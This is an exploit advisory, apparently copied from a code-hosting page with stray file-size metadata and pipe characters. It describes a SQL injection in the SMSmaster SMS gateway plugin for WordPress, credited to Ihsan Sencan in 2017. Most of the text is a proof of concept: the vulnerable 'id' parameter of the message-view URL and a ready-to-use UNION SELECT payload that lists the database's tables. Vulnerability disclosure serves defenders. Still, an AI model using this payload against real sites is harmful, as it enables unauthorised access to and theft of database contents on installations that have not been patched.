27 lines
No EOL
933 B
Text
27 lines
No EOL
933 B
Text
# # # # #
|
||
# Exploit Title: SMSmaster – Multipurpose SMS Gateway for Wordpress - SQL Injection
|
||
# Dork: N/A
|
||
# Date: 26.09.2017
|
||
# Vendor Homepage: http://mojoomla.com/
|
||
# Software Link: https://codecanyon.net/item/smsmaster-multipurpose-sms-gateway-for-wordpress/20605853
|
||
# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/
|
||
# Version: N/A
|
||
# Category: Webapps
|
||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||
# CVE: N/A
|
||
# # # # #
|
||
# Exploit Author: Ihsan Sencan
|
||
# Author Web: http://ihsan.net
|
||
# Author Social: @ihsansencan
|
||
# # # # #
|
||
# Description:
|
||
# The vulnerability allows an student users to inject sql commands....
|
||
#
|
||
# Proof of Concept:
|
||
#
|
||
# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
|
||
#
|
||
# -23102%20UNION%20SELECT%201,2,3,4,5,(SELECT%20GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=DATABASE()),7,8--%20-
|
||
#
|
||
# Etc..
|
||
# # # # # |